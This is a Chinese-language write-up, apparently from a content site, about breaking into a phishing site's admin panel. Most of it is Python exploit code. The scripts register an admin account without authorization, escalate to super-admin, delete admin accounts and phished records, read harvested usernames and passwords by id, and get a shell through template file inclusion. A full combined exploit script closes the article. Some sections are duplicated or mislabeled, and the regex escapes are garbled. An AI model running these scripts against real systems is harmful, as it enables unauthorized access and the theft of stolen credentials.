时间:2023-07-22 03:03:01 | 来源:网站运营
时间:2023-07-22 03:03:01 来源:网站运营
干货技术,记载钓鱼网站的多次渗透:记一次对钓鱼网站的多次渗透$data['username'] = I('post.p','','md5');$data['password'] = I('post.c','','md5');
然后它竟然直接进行进行添加管理员了,不过这个管理员不是超级管理员,但是可以登录后台就已经足够了,下面有个漏洞是提权python def RegAdmin(): domain="127.0.0.1" username="".join(random.sample('zyxwvutsrqponmlkjihgfedcba12345678910',10)) password="".join(random.sample('zyxwvutsrqponmlkjihgfedcba12345678910',10)) headers = { 'X-Requested-With':'XMLHttpRequest', 'Content-Type':'application/x-www-form-urlencoded' } data="p="+username+"&c="+password flag = requests.post("http://"+domain+"/admin.php/login/regist", data=data,headers=headers).text.find("//u8d26//u53f7//u5bc6//u7801//u521b//u5efa//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability /nUserName: "+hashlib.md5(username.encode("utf-8")).hexdigest()+" PassWord: "+password else: return "Failure To Exploit A Vulnerability"
漏洞二 将普通管理员提权到超级管理员 我们看到验证管理员的逻辑是这样的,它先从session取出管理员的id然后进行查询 判断字段 is_all 是否等于1,如果是1则不是管理员,反之 我们只需要社工管理员让他删掉我们的账户,我们就可以跳过这个认证,成为超级管理员python def classdel(id): domain="127.0.0.1" cookie="PHPSESSID=2cplbvnuqko23di92lj7ufjpk1" headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie':cookie } data = "id="+str(id) flag = requests.post("http://" + domain + "/admin.php/Class/classdel", data=data, headers=headers).text.find("//u5220//u9664//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability"; else: return "Failure To Exploit A Vulnerability"
漏洞四 越权删除超级管理员 直接将post过来的id进行删除,只能删除超级管理员python def userdel(id): domain="127.0.0.1" cookie="PHPSESSID=2cplbvnuqko23di92lj7ufjpk1" headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie':cookie } data = "id="+str(id) flag = requests.post("http://" + domain + "/admin.php/User/userdel", data=data, headers=headers).text.find("//u5220//u9664//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability"; else: return "Failure To Exploit A Vulnerability"
漏洞五 越权删除钓鱼密码 直接将post过来的id进行删除,不能删除含有普通管理员id的python def userdel(id): domain="127.0.0.1" cookie="PHPSESSID=2cplbvnuqko23di92lj7ufjpk1" headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie':cookie } data = "id="+str(id) flag = requests.post("http://" + domain + "/admin.php/User/userdel", data=data, headers=headers).text.find("//u5220//u9664//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability"; else: return "Failure To Exploit A Vulnerability"
漏洞五 越权查看钓鱼密码 直接将get过来的id进行查询python def GetPass(id): domain="127.0.0.1" cookie="PHPSESSID=2cplbvnuqko23di92lj7ufjpk1" headers = { 'Cookie': cookie } username="" password="" result=requests.get("http://"+domain+"/admin.php/pass/uppass/id/"+str(id)+".html",headers=headers).text searchObj = re.search(r'id="username"/s+/S+/s+value="(/S+)"', result, re.M | re.I) searchObj2 = re.search(r'id="password"/s+/S+/s+value="(/S+)"', result, re.M | re.I) try: username = searchObj.group(1) password = searchObj2.group(1) except Exception: return "Failure To Exploit A Vulnerability" return username+"-----"+password; return result
漏洞六 GetShell 文件包含 前提是能在目标服务器上传.html后缀的文件python def uptemple(filename): domain="127.0.0.1" cookie="PHPSESSID=2cplbvnuqko23di92lj7ufjpk1" headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie':cookie } data = "u="+filename flag = requests.post("http://" + domain + "/admin.php/Temple/uptemple", data=data, headers=headers).text.find("//u4e3b//u9898//u5207//u6362//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability"; else: return "Failure To Exploit A Vulnerability" return result
0x04 利用以上漏洞我们已经控制了目标服务器 我们看到这个钓鱼网站有很多的模板,还注明了钓鱼网站的作者,我们把它钓到的密码进行删除 完整 exp python import hashlib import random import requests import re domain="127.0.0.1" cookie="PHPSESSID=2cplbvnuqko23di92lj7ufjpk1" def GetPass(id): global cookie global domain headers = { 'Cookie': cookie } username="" password="" result=requests.get("http://"+domain+"/admin.php/pass/uppass/id/"+str(id)+".html",headers=headers).text searchObj = re.search(r'id="username"/s+/S+/s+value="(/S+)"', result, re.M | re.I) searchObj2 = re.search(r'id="password"/s+/S+/s+value="(/S+)"', result, re.M | re.I) try: username = searchObj.group(1) password = searchObj2.group(1) except Exception: return "Failure To Exploit A Vulnerability" return username+"-----"+password; return result def DelPass(id): global cookie global domain headers = { 'X-Requested-With':'XMLHttpRequest', 'Content-Type':'application/x-www-form-urlencoded', 'Cookie': cookie } flag= requests.post("http://"+domain+"/admin.php/Pass/passdel",data="id="+str(id),headers=headers).text.find("//u5220//u9664//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability" else: return "Failure To Exploit A Vulnerability" def RegAdmin(): global domain username="".join(random.sample('zyxwvutsrqponmlkjihgfedcba12345678910',10)) password="".join(random.sample('zyxwvutsrqponmlkjihgfedcba12345678910',10)) headers = { 'X-Requested-With':'XMLHttpRequest', 'Content-Type':'application/x-www-form-urlencoded' } data="p="+username+"&c="+password flag = requests.post("http://"+domain+"/admin.php/login/regist", data=data,headers=headers).text.find("//u8d26//u53f7//u5bc6//u7801//u521b//u5efa//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability /nUserName: "+hashlib.md5(username.encode("utf-8")).hexdigest()+" PassWord: "+password else: return "Failure To Exploit A Vulnerability" def classdel(id): global domain global cookie headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie':cookie } data = "id="+str(id) flag = requests.post("http://" + domain + "/admin.php/Class/classdel", data=data, headers=headers).text.find("//u5220//u9664//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability"; else: return "Failure To Exploit A Vulnerability" def userdel(id): global domain global cookie headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie':cookie } data = "id="+str(id) flag = requests.post("http://" + domain + "/admin.php/User/userdel", data=data, headers=headers).text.find("//u5220//u9664//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability"; else: return "Failure To Exploit A Vulnerability" def uptemple(filename): global domain global cookie headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie':cookie } data = "u="+filename flag = requests.post("http://" + domain + "/admin.php/Temple/uptemple", data=data, headers=headers).text.find("//u4e3b//u9898//u5207//u6362//u6210//u529f")!=-1 if flag: return "Exploit The Vulnerability"; else: return "Failure To Exploit A Vulnerability" if __name__=="__main__": print(RegAdmin())添加管理员 print(GetPass(1))获取密码 print(DelPass(1))删除密码 print(classdel(1))删除分类 print(userdel(1))删除管理员 print(uptemple("../test")) 文件包含
关键词:渗透,鱼网,技术,干货,记载